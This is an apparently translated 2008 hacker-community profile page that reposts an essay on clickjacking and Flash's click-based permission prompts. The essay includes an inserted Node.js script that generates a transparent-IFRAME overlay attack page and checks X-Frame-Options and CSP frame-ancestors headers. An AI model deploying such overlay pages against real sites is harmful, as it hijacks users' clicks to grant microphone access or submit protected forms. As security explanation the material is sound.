House of Hackers

Creegan 11.9, 23, Male
San José, Costa Rica

CR33G4N'S SHARES

Clickjacking and Flash

I heard of clickjacking a couple of weeks back when the media blast started. At that time I had a very vague idea of what it was, and just recently I saw some PoCs coming out that show how it works in practice.


Clickjacking, if I may categorize it, falls into the category of GUI attacks. I associate it with the focus-stealing attack, which lets an attacker steal any file from the victim's disk as long as the victim is tricked into typing enough characters. OK, that is not a razor-sharp exploit, but it is an exploit nevertheless.

In essence, the clickjacking technique lets an attacker trick the victim into clicking on areas of a disguised HTML element, such as an IFRAME preloaded with, say, the victim's own Facebook account page. The click is performed by the victim's browser, inside the victim's session, on a form that the target site itself rendered, so any anti-CSRF token embedded in that form is submitted along with it exactly as the site expects. If nothing else, clickjacking is the killer of most anti-CSRF techniques.

I haven't been thinking about clickjacking at all. I mean, the attack is quite obvious and the potential for damage is there. However, this morning when I woke up, an interesting question started to circulate in my head: what is Adobe's deal? After all, Adobe are the ones who asked Jeremiah and rsnake to cancel their OWASP presentation. The answer came quite quickly and naturally.

The simple truth is that Adobe are worried about the clickjacking technique because Flash's current security model, and even more so its future and much enhanced one, relies on user interaction, i.e. clicks performed by the user. Therefore, today an attacker can trick the user into clicking the Allow button of the microphone permission prompt, so that the microphone picks up the sound in the room where the victim's equipment is located. They can use clickjacking for that! But there is more.

If you have been following the development of the Flash platform, you are probably aware that Flash will soon become practically the most powerful web tool out there. Seriously, Adobe are revolutionizing the way we interact with the Web. Not only will Flash support a primitive P2P streaming protocol (I need to think of something malicious to do with that…), but it will also allow users to open and save files from and to their local disk. The only catch is that this feature is available via the FileReference class, whose file-chooser methods cannot simply be called by script at any time. Instead, the developer has to call them from the handler of a user-initiated event such as a click; the runtime refuses the call otherwise.

I do not think this security model is bulletproof. The potential for abuse is obvious, and since clicks are the driving force of Flash's future security model, clickjacking is what comes to mind if you want to abuse them. Perhaps in the future we might be able to connect to TCP sockets as long as the user clicks?
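As an added example (not code from the original post or from GNUCITIZEN), the following Node.js script shows the two halves of the overlay trick described in the paragraphs above, for the plain IFRAME case and for the Flash permission-prompt case alike: it generates an attacker page that places a fully transparent IFRAME of the target over a decoy button, so that the victim's click lands on whatever element sits at a chosen coordinate inside the framed page (the Allow button of a permission prompt, a settings form, a Facebook action), and it evaluates whether a target's response headers would prevent that framing at all. The target URL, decoy label, coordinates and header sets are constructed, hypothetical inputs. The header check covers X-Frame-Options and CSP frame-ancestors, defenses that browsers adopted after this post was written; with neither header present, which is the situation the post describes, any site can be overlaid.

```javascript
// Added example: clickjacking overlay page generator plus a framing-policy check.
// Not from the original post; every input below is constructed for illustration.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Build the attacker page. The decoy button sits at a fixed spot (100,100).
// The target IFRAME is shifted by (-offsetX, -offsetY) so that the element at
// (offsetX, offsetY) inside the framed page lands exactly under the decoy. The
// frame is made fully transparent but stacked on top (z-index:2), so the click
// the victim believes to be on the decoy is delivered to the framed page.
function buildClickjackPage({ targetUrl, decoyLabel, offsetX, offsetY, width = 1000, height = 800 }) {
  const left = 100 - offsetX;
  const top = 100 - offsetY;
  return [
    "<!DOCTYPE html>",
    "<html><head><style>",
    "  #decoy  { position:absolute; left:100px; top:100px; z-index:1; }",
    `  #victim { position:absolute; left:${left}px; top:${top}px; width:${width}px; height:${height}px;`,
    "            opacity:0; z-index:2; border:0; }",
    "</style></head><body>",
    `<button id="decoy">${escapeHtml(decoyLabel)}</button>`,
    `<iframe id="victim" src="${escapeHtml(targetUrl)}" scrolling="no"></iframe>`,
    "</body></html>",
  ].join("\n");
}

// Decide whether a page served with `headers` may be framed by a document
// whose origin is `topOrigin`. CSP frame-ancestors takes precedence over
// X-Frame-Options when both are present; with neither, framing is allowed.
// Source matching is exact-origin only (no scheme or wildcard-host sources).
function framingAllowed(headers, topOrigin, targetOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  const csp = h["content-security-policy"];
  if (csp) {
    const directive = csp.split(";").map(s => s.trim())
      .find(s => s.toLowerCase().startsWith("frame-ancestors"));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1).map(s => s.toLowerCase());
      if (sources.includes("'none'")) return { allowed: false, reason: "frame-ancestors 'none'" };
      if (sources.includes("*")) return { allowed: true, reason: "frame-ancestors *" };
      if (sources.includes("'self'") && topOrigin === targetOrigin) {
        return { allowed: true, reason: "frame-ancestors 'self' and same origin" };
      }
      if (sources.includes(topOrigin.toLowerCase())) {
        return { allowed: true, reason: `frame-ancestors lists ${topOrigin}` };
      }
      return { allowed: false, reason: "frame-ancestors does not list the top origin" };
    }
  }

  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return { allowed: false, reason: "X-Frame-Options: DENY" };
  if (xfo === "SAMEORIGIN") {
    return { allowed: topOrigin === targetOrigin, reason: "X-Frame-Options: SAMEORIGIN" };
  }
  return { allowed: true, reason: "no framing restriction sent" };
}

// Constructed demo: a hypothetical target whose sensitive button sits at (320,240).
const demoPage = buildClickjackPage({
  targetUrl: "https://target.example/settings",
  decoyLabel: "Claim your prize",
  offsetX: 320, offsetY: 240,
});
console.log(demoPage);
for (const [label, headers] of [
  ["no headers (the situation in the post)", {}],
  ["X-Frame-Options: DENY", { "X-Frame-Options": "DENY" }],
  ["CSP frame-ancestors 'none'", { "Content-Security-Policy": "frame-ancestors 'none'" }],
]) {
  console.log(label, "->", framingAllowed(headers, "https://attacker.example", "https://target.example"));
}
```

Run it with `node clickjack.js`; the generated page is only useful against a target that sends neither header, which is the point: whatever the framed page is (a site's own form or the Flash permission prompt), the attacker controls only where the click lands, not what it does, and the target cannot tell a hijacked click from a genuine one.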

In conclusion, clickjacking is not a killer problem and it does not break the Web, well, not entirely. However, the clickjacking problem is hard to solve. I believe it is even harder to solve than any overflow you may have to deal with. Why? Because we are dealing with user interaction and graphic-design problems. The solution has to be so clean that it doesn't break half of the Web.

---
gnucitizen: information security gigs, part of the cutting-edge network


Recruits at the service of Facebook

The next generation of British spies also depends in part on Facebook. The British secret intelligence service, MI6, is looking for agents inside the popular social network. It is usual for this institution to look for recruits and to promote itself in the country's universities, so it is not surprising that it is now looking for talent on Facebook, a social network widely used among university students.

Computer sold on eBay with the bank details of several customers

London (EFECOM). Bank details of customers of several banks have been found on the hard disk of a computer sold in England on eBay, the online auction company. The disk contained the bank account numbers, telephone numbers and signatures of more than a million customers of American Express, NatWest and the Royal Bank of Scotland, the British newspaper "The Independent" reports today.

 

Creegan's Corner

Latest Activity

Creegan 11.9 commented on the group Hackers Hispanos Oct 10
Creegan 11.9 and Z1Br4t are now friends Oct 9
Creegan 11.9 left a comment for Crescent Hacker Oct 9
Creegan 11.9 replied to the discussion Mobile Oct 9
Creegan 11.9 left a comment for Enigma Oct 9
537465616C7468 and Creegan 11.9 are now friends Oct 8
sew_nice0999 left a comment for Creegan 11.9 Oct 8
Creegan 11.9 left a comment for sew_nice0999 Oct 8

Profile Information

Real Name: Esteban A. Torres Hernández
Blog: http://estebantorres.blogspot.com
Occupation: Software Developer

Creegan 11.9's Blog

Creegan 11.9

A Social Experiment contestants

OK, here I'm going to write down the list of "enlisted" contestants for the "Social Experiment". So far we have: - Codejunky -…

Posted on September 30th, 2008 at 4:00pm — 4 Comments

Creegan 11.9

HoH Administrators


As many of you have noticed, or should have, HoH has new administrators.
Basically this note is to make those administrators known to everyone, explaining a few details about each of them so that each of you knows whom to talk to when the time comes.

All of us really want to make this site a better place, and also to get rid of the script kiddies.
We also have the goal of avoiding illegal activities; in short, of keeping to the site's ethical rules.

Posted on September 22nd, 2008 at 10:30pm — 8 Comments

Comment Wall (19 comments)


At 4:01am on October 8th, 2008, sew_nice0999 said…
Did you find the video kid with the vacuum?
At 3:24am on October 8th, 2008, sew_nice0999 said…
Hey Creegan, it's called 'mad kid tosses vacuum out of window' on the video page.
Sew
At 2:56am on October 6th, 2008, glenn arrandale said…
Sorry, you're right, I do want to learn.
At 2:40am on October 6th, 2008, 99876 said…
Good morning.
Seeing that you speak Spanish, I'll tell you a bit about the idea in this language.

There's no problem at all about whose idea it is; on the contrary, it's nothing new that hasn't been done before. The idea is simply that, seeing that I have a couple of PCs sitting unused in my room at the moment, it occurred to me to set up some kind of servers or something along those lines and play at taking them down, taking control of them, or hiding some file on them and seeing who gets it and posts it on a HoH blog.

Obviously I wouldn't play, since otherwise it would make no sense. But anyway, at least it would give HoH a bit more activity, and if it all works out maybe one day someone else will put up a server and then I will be able to play; if not, no problem.

Anyway, I gladly offer to set up the servers for a game, or if anyone comes up with another idea for which we could use these 2 PCs, it's welcome.

Regards, Creegan.
At 6:12pm on September 30th, 2008, whte wolf said…
Thanks Creegan, but I really want help.
At 7:42am on September 24th, 2008, Jonah Hex said…
Creegan
What happened to PDP, is he still an administrator?
...and why have the latest blog entries been removed from the main page? Those used to be the first stories I read when logging in.
At 6:15am on September 24th, 2008, Deep bLue o:) said…
Hi!!! Thanks for the add. My Spanish is not very good, hehehe. Regards.
At 11:19am on September 23rd, 2008, >>DaRkNeSsEs<< said…
First of all, congratulations on becoming an administrator. As for the posts, I just hope you let me know where I can make them; I will also send you a personal message with some additional comments, such as suggestions about a topic I was asking about on the site. Regards Creegan, and I hope to be more in contact with you.
At 11:09pm on September 22nd, 2008, misunderstood said…
Strange... don't see it either.
At 10:15pm on September 22nd, 2008, misunderstood said…
(gmt+1:00)
 
 


© 2008 Created by Petko D. (pdp) Petkov on Ning.
